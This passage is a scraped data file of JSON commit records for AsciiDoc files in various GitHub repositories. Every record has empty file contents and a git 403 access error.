2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable 
to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c4094bbd1bad3a874735f3325e0233120244b0f","subject":"Update 2016-12-30-Kleptography-in-RSA.adoc","message":"Update 2016-12-30-Kleptography-in-RSA.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"702cc1d2bba263ea5d2a3a78f274e5bcbd5d5d8a","subject":"Extract SecurityContextHolder Docs","message":"Extract SecurityContextHolder Docs\n\nIssue gh-8005\n","repos":"fhanik\/spring-security,rwinch\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,fhanik\/spring-security,djechelon\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,rwinch\/spring-security,fhanik\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,djechelon\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/authentication\/architecture\/security-context-holder.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/authentication\/architecture\/security-context-holder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da0084495048b84bd7bef1c542567d2aa6890459","subject":"update","message":"update\n","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","new_file":"_posts\/2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cfeb77db4b25e6b86693f474d5948b2a1f55230","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","message":"Update 
2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9245d786ae0cab844de4577bde67116b6cc0dab3","subject":"Update 2017-01-20-Swift-Web-View.adoc","message":"Update 2017-01-20-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62852461327be6857923c3531d1eb20d3773427d","subject":"Update 2018-01-02-Happy-New-Year.adoc","message":"Update 2018-01-02-Happy-New-Year.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-01-02-Happy-New-Year.adoc","new_file":"_posts\/2018-01-02-Happy-New-Year.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68d9b812ddbcd10b60ef3277376c8e8325fbf3d3","subject":"Define custom browsers","message":"Define custom browsers\n","repos":"mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/sections\/14-setup-eclipse.adoc","new_file":"src\/sections\/14-setup-eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba46cf34b33f4e8cb11695a123264b8c40670ca0","subject":"git: Add an `installation` section to the readme","message":"git: Add an `installation` section to the readme\n\nThis section explains how to install the git configuration. 
This\nincludes caveats such as creating the $HOME\/.config folder first, so\nthat stow links *within* the folder, and not the folder itself (which\nwould prevent any other configuration from using the $HOME\/.config\nfolder).\n","repos":"PigeonF\/.dotfiles","old_file":"git\/README.adoc","new_file":"git\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1da23769c3dabd864b3a21895eea93770aa99f49","subject":"Design abstract model generation mechanism","message":"Design abstract model generation mechanism\n","repos":"dakusui\/jcunit,dakusui\/jcunit","old_file":"src\/test\/java\/com\/github\/dakusui\/jcunit8\/extras\/normalizer\/package-info.adoc","new_file":"src\/test\/java\/com\/github\/dakusui\/jcunit8\/extras\/normalizer\/package-info.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakusui\/jcunit.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c19e0085a0fcb1f533440832bd0aae8c09995c13","subject":"Update 2017-03-22-El-primer-post.adoc","message":"Update 2017-03-22-El-primer-post.adoc","repos":"thefreequest\/thefreequest.github.io,thefreequest\/thefreequest.github.io,thefreequest\/thefreequest.github.io,thefreequest\/thefreequest.github.io","old_file":"_posts\/2017-03-22-El-primer-post.adoc","new_file":"_posts\/2017-03-22-El-primer-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thefreequest\/thefreequest.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c09ebf822314728c1015a477b4be945ffa48933b","subject":"User stories 1.0 (#4361)","message":"User stories 1.0 (#4361)\n\nUser stories for 1.0\r\n\r\nCo-authored-by: k-wall <82661567142926be395d42451b0008b62207b650@apache.org>","repos":"EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse","old_file":"documentation\/design\/user-stories\/shared-infra.adoc","new_file":"documentation\/design\/user-stories\/shared-infra.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EnMasseProject\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ea3c953570286103ef1fb725a0464faaaf364f89","subject":"Update 2015-09-25-Start-simple.adoc","message":"Update 2015-09-25-Start-simple.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Start-simple.adoc","new_file":"_posts\/2015-09-25-Start-simple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c84563ae0fb277e8db9a175f6ed725669e2d66d9","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 
2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b77d905e8936bbdb4b1d0a90c1eeffab0ffb8f79","subject":"Update 2015-09-25-Back-to-Basic.adoc","message":"Update 2015-09-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c483978bd3223c9ea4f61a3080622d1d95b507b4","subject":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","message":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c344573cfd93ba11b1266787b7c65e7082052fb","subject":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","message":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c89fd79fc0a90196794e92a029d00c88044ff3d4","subject":"Update 2016-03-16-How-to-update-hubpress.adoc","message":"Update 2016-03-16-How-to-update-hubpress.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2016-03-16-How-to-update-hubpress.adoc","new_file":"_posts\/2016-03-16-How-to-update-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"242ec76e2088078b56a15f9682f70b3a46b90ae5","subject":"Update 2017-01-19-Swift-Web-View.adoc","message":"Update 
2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d8f860ff11a67784084076f8da03cd2afb8059e","subject":"Init Project","message":"Init Project\n","repos":"bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bindstone\/graphbank.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a46ad0f446919628612eca95c4ef8942cfd0dc34","subject":"SEC-2951: Polish","message":"SEC-2951: Polish\n","repos":"ollie314\/spring-security,zshift\/spring-security,ractive\/spring-security,cyratech\/spring-security,panchenko\/spring-security,panchenko\/spring-security,raindev\/spring-security,follow99\/spring-security,chinazhaoht\/spring-security,thomasdarimont\/spring-security,eddumelendez\/spring-security,forestqqqq\/spring-security,spring-projects\/spring-security,diegofernandes\/spring-security,yinhe402\/spring-security,jmnarloch\/spring-security,ajdinhedzic\/spring-security,ollie314\/spring-security,diegofernandes\/spring-security,djechelon\/spring-security,thomasdarimont\/spring-security,pkdevbox\/spring-security,diegofernandes\/spring-security,likaiwalkman\/spring-security,jgrandja\/spring-security,zgscwjm\/spring-security,rwinch\/spring-security,caiwenshu\/spring-security,mrkingybc\/spring-security,fhanik\/spring-security,mdeinum\/spring-security,olezhuravlev\/spring-security,caiwenshu\/spring-security,mrkingybc\/spring-security,likaiwalkman\/spring-security,Peter32\/spring-security,yinhe402\/spring-security,Krasnyanskiy\/spring-security,chinazhaoht\/spring-security,mrkingybc\/spring-security,follow99\/spring-security,mparaz\/spring-security,zgscwjm\/spring-security,ollie314\/spring-security,mounb\/spring-security,jmnarloch\/spring-security,eddumelendez\/spring-security,eddumelendez\/spring-security,MatthiasWinzeler\/spring-security,xingguang2013\/spring-security,driftman\/spring-security,wkorando\/spring-security,forestqqqq\/spring-security,fhanik\/spring-security,wkorando\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,follow99\/spring-security,olezhuravlev\/spring-security,Peter32\/spring-security,olezhuravlev\/spring-security,eddumelendez\/spring-security,SanjayUser\/SpringSecurityPro,zgscwjm\/spring-security,SanjayUser\/SpringSecurityPro,adairtaosy\/spring-security,hippostar\/spring-security,mounb\/spring-security,mdeinum\/spring-security,zhaoqin102\/spring-security,rwinch\/spring-security,mrkingybc\/spring-security,Krasnyanskiy\/spring-security,zshift\/spring-security,liuguohua\/spring-security,kazuki43zoo\/spring-security,jmnarloch\/spring-security,spring-projects\/spring-security,Krasnyanskiy\/spring-security,cyratech\/spring-security,ajdinhedzic\/spring-security,driftman\/spring-security,caiwenshu\/spring-security,yinhe402\/spring-security,xingguang2013\/spring-security,Xcorpio\/spring-security,thomasdarimont\/sp
ring-security,thomasdarimont\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,Krasnyanskiy\/spring-security,zshift\/spring-security,ractive\/spring-security,mounb\/spring-security,jgrandja\/spring-security,panchenko\/spring-security,ajdinhedzic\/spring-security,cyratech\/spring-security,raindev\/spring-security,pkdevbox\/spring-security,jgrandja\/spring-security,zshift\/spring-security,panchenko\/spring-security,ractive\/spring-security,hippostar\/spring-security,pwheel\/spring-security,Xcorpio\/spring-security,ajdinhedzic\/spring-security,rwinch\/spring-security,kazuki43zoo\/spring-security,thomasdarimont\/spring-security,liuguohua\/spring-security,jgrandja\/spring-security,SanjayUser\/SpringSecurityPro,mparaz\/spring-security,rwinch\/spring-security,wkorando\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,forestqqqq\/spring-security,Xcorpio\/spring-security,mdeinum\/spring-security,mparaz\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,pwheel\/spring-security,MatthiasWinzeler\/spring-security,pkdevbox\/spring-security,SanjayUser\/SpringSecurityPro,kazuki43zoo\/spring-security,follow99\/spring-security,pwheel\/spring-security,MatthiasWinzeler\/spring-security,adairtaosy\/spring-security,cyratech\/spring-security,djechelon\/spring-security,kazuki43zoo\/spring-security,Xcorpio\/spring-security,spring-projects\/spring-security,MatthiasWinzeler\/spring-security,wkorando\/spring-security,caiwenshu\/spring-security,forestqqqq\/spring-security,hippostar\/spring-security,adairtaosy\/spring-security,Peter32\/spring-security,pkdevbox\/spring-security,olezhuravlev\/spring-security,rwinch\/spring-security,djechelon\/spring-security,zhaoqin102\/spring-security,zgscwjm\/spring-security,mounb\/spring-security,raindev\/spring-security,spring-projects\/spring-security,raindev\/spring-security,fhanik\/spring-security,SanjayUser\/SpringSecurityPro,chinazhaoht\/spring-security,yinhe402\/spring-security,chinazhaoht\/spring-security,liuguohua\/spring-security,likaiwalkman\/spring-security,driftman\/spring-security,hippostar\/spring-security,liuguohua\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,ollie314\/spring-security,mdeinum\/spring-security,eddumelendez\/spring-security,Peter32\/spring-security,jmnarloch\/spring-security,diegofernandes\/spring-security,kazuki43zoo\/spring-security,xingguang2013\/spring-security,pwheel\/spring-security,zhaoqin102\/spring-security,olezhuravlev\/spring-security,zhaoqin102\/spring-security,driftman\/spring-security,xingguang2013\/spring-security,mparaz\/spring-security,djechelon\/spring-security,ractive\/spring-security,adairtaosy\/spring-security,likaiwalkman\/spring-security,rwinch\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"13054bcbfa8671af72beaa8b7435cdcff9a6242b","subject":"Create 2017-01-25 Test asciidoc.adoc","message":"Create 2017-01-25 Test asciidoc.adoc","repos":"adrianwmasters\/adrianwmasters.github.io","old_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/adrianwmasters\/adrianwmasters.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c93083a48ebbb4e5c369c49d6f0bff65b9eeccb","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5a2db414a64f778619ac823a0dc4fc1f74179ea","subject":"Update 2017-02-23.adoc","message":"Update 2017-02-23.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-23.adoc","new_file":"_posts\/2017-02-23.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e45e999ba93571b32d1197d65f2dcb09994237f0","subject":"Update 2017-12-17-.adoc","message":"Update 2017-12-17-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-17-.adoc","new_file":"_posts\/2017-12-17-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aed5e4e3c9a439bb56e0bebec556da75dcf046db","subject":"Update YubiKey_and_OpenVPN_via_PAM.adoc","message":"Update YubiKey_and_OpenVPN_via_PAM.adoc","repos":"madrat-\/yubico-pam,eworm-de\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam","old_file":"doc\/YubiKey_and_OpenVPN_via_PAM.adoc","new_file":"doc\/YubiKey_and_OpenVPN_via_PAM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"70e7b67111c8425feadebb4c72280d42adf6e227","subject":"Update 2018-06-08-Swift-Firestore.adoc","message":"Update 2018-06-08-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7050e360535b26561c3d0bea0933e011e5ff9d3","subject":"Update 2015-09-15-title.adoc","message":"Update 
2015-09-15-title.adoc","repos":"dawn-chiniquy\/clear-project.org,clear-project\/blog,dawn-chiniquy\/clear-project.org,clear-project\/blog,clear-project\/blog,dawn-chiniquy\/clear-project.org","old_file":"_posts\/2015-09-15-title.adoc","new_file":"_posts\/2015-09-15-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clear-project\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2b4f13c493b65fec6623530e7ab6aebeb7397d4","subject":"Update 2017-03-26-teste.adoc","message":"Update 2017-03-26-teste.adoc","repos":"carlosdelfino\/carlosdelfino-hubpress,carlosdelfino\/carlosdelfino-hubpress,carlosdelfino\/carlosdelfino-hubpress,carlosdelfino\/carlosdelfino-hubpress","old_file":"_posts\/2017-03-26-teste.adoc","new_file":"_posts\/2017-03-26-teste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlosdelfino\/carlosdelfino-hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af33b85ba98909b8002d6fcadfbd4bafde145b0a","subject":"Update 2016-10-24-Unable-to-locate-site-descriptor-maven-site-plugin-problem.adoc","message":"Update 2016-10-24-Unable-to-locate-site-descriptor-maven-site-plugin-problem.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2016-10-24-Unable-to-locate-site-descriptor-maven-site-plugin-problem.adoc","new_file":"_posts\/2016-10-24-Unable-to-locate-site-descriptor-maven-site-plugin-problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcollignon\/tcollignon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25a8294d80ecfdbc190ba768dfc41f56ee0bdec7","subject":"Update 2015-11-20-Ver-el-codigo-de-error-del-comando-anterior.adoc","message":"Update 2015-11-20-Ver-el-codigo-de-error-del-comando-anterior.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-20-Ver-el-codigo-de-error-del-comando-anterior.adoc","new_file":"_posts\/2015-11-20-Ver-el-codigo-de-error-del-comando-anterior.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1b95158515f9b756975ec3c6164d0c197552a9e","subject":"Updated index.adoc with planned phases for the project.","message":"Updated index.adoc with planned phases for the project.\n","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2b20b120f176903d0585289fcda29cf6f7d62052","subject":"Update 2018-01-29-Node-Patterns.adoc","message":"Update 
2018-01-29-Node-Patterns.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-01-29-Node-Patterns.adoc","new_file":"_posts\/2018-01-29-Node-Patterns.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"454d7c859da4f3a821783302ae940fb34d00eae5","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f7d698897194081c98a51f8209a8b51bd0f0cd8","subject":"Updated to reference new s-c-starter-config. Updated versions of boot and s-c-starter-parent in example pom.xml.","message":"Updated to reference new s-c-starter-config.\nUpdated versions of boot and s-c-starter-parent in example pom.xml.\n","repos":"rajkumargithub\/spring-cloud-config,mstine\/spring-cloud-config,marbon87\/spring-cloud-config,psbateman\/spring-cloud-config,royclarkson\/spring-cloud-config,fangjing828\/spring-cloud-config,marbon87\/spring-cloud-config,appleman\/spring-cloud-config,mstine\/spring-cloud-config,appleman\/spring-cloud-config,appleman\/spring-cloud-config,psbateman\/spring-cloud-config,psbateman\/spring-cloud-config,rajkumargithub\/spring-cloud-config,spring-cloud\/spring-cloud-config,rajkumargithub\/spring-cloud-config,shakuzen\/spring-cloud-config,spring-cloud\/spring-cloud-config,shakuzen\/spring-cloud-config,fangjing828\/spring-cloud-config,mbenson\/spring-cloud-config,mbenson\/spring-cloud-config,spring-cloud\/spring-cloud-config,thomasdarimont\/spring-cloud-config,thomasdarimont\/spring-cloud-config,fkissel\/spring-cloud-config,mstine\/spring-cloud-config,fkissel\/spring-cloud-config,royclarkson\/spring-cloud-config,fkissel\/spring-cloud-config,fangjing828\/spring-cloud-config,marbon87\/spring-cloud-config,royclarkson\/spring-cloud-config,mbenson\/spring-cloud-config,thomasdarimont\/spring-cloud-config,shakuzen\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/quickstart.adoc","new_file":"docs\/src\/main\/asciidoc\/quickstart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomasdarimont\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"684d3d070ced0c73060f0b63e4f70588bc0236c0","subject":"Update 2016-04-01-First-Post.adoc","message":"Update 
